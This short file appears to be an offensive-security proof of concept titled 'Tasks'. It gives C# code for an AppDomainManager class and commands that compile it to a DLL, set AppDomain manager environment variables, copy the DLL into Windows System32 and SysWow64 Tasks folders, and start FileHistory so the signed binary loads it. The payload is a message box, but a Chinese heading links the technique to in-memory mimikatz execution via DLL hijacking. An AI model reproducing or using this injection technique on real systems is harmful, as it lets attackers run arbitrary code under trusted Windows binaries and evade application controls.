Tasks

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;


public sealed class MyAppDomainManager : AppDomainManager
{
  
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
		System.Windows.Forms.MessageBox.Show("AppDomain - KaBoom!");
		// You have more control here than I am demonstrating. For example, you can set ApplicationBase, 
		// Or you can Override the Assembly Resolver, etc...
        return;
    }
}

/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:tasks.dll tasks.cs
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
set COMPLUS_Version=v4.0.30319
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
FileHistory /?
*/

https://gist.github.com/caseysmithrc/4bb34d28fa9d4071596cf2417fee5e37

C#内存加载执行mimikatz 之dll劫持

https://twitter.com/subTee/status/1157521629695508480
https://gist.github.com/caseysmithrc/3a4db14d571e902dc8c2e00fdbb9907f
https://gist.github.com/demonsec666/644c6905cabe405364efe2ceea29e30c